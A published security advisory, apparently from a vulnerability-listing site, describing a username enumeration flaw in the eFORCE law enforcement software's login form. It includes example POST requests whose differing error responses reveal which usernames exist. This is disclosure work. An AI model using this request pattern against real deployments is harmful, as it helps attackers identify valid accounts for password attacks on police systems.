IntelliChoice eFORCE Software Suite 2.5.9 Username Enumeration

2021.07.30
Credit: LiquidWorm
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration Vendor: IntelliChoice, Inc. Product web page: https://www.eforcesoftware.com Affected version: 2.5.9.6 2.5.9.5 2.5.9.3 2.5.9.2 2.5.9.1 2.5.8.0 2.5.7.20 2.5.7.18 2.5.6.18 2.5.4.6 2.5.3.11 Summary: IntelliChoice is a United States software company that was founded in 2003, and offers a software title called eFORCE Software Suite. eFORCE Software Suite is law enforcement software, and includes features such as case management, court management, crime scene management, criminal database, dispatching, evidence management, field reporting, scheduling, court management integration, certification management, and incident mapping. With regards to system requirements, eFORCE Software Suite is available as SaaS, Windows, iPhone, and iPad software. Desc: The weakness is caused due to the login script and how it verifies provided credentials. Attacker can use this weakness to enumerate valid users on the affected application via 'ctl00$MainContent$UserName' POST parameter. Tested on: Microsoft-IIS/10.0 Microsoft-IIS/8.5 ASP.NET/4.0.30319 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5658 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php 03.05.2021 -- Request/response for existent username: --------------------------------------- POST /eFORCECommand/Account/Login.aspx HTTP/1.1 __LASTFOCUS: __EVENTTARGET: __EVENTARGUMENT: __VIEWSTATE: Xxx __VIEWSTATEGENERATOR: 4A5A1A0F __EVENTVALIDATION: Xxx ctl00$MainContent$UserName: eforce ctl00$MainContent$Password: 123456 ctl00$MainContent$btnLogin.x: 20 ctl00$MainContent$btnLogin.y: 7 Response: Invalid password entered for username eforce. Request/response for non-existent username: ------------------------------------------- POST /eFORCECommand/Account/Login.aspx HTTP/1.1 __LASTFOCUS: __EVENTTARGET: __EVENTARGUMENT: __VIEWSTATE: Xxx __VIEWSTATEGENERATOR: 4A5A1A0F __EVENTVALIDATION: Xxx ctl00$MainContent$UserName: testingus ctl00$MainContent$Password: 123456 ctl00$MainContent$btnLogin.x: 20 ctl00$MainContent$btnLogin.y: 7 Response: Unable to login: User name testingus is not registered.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top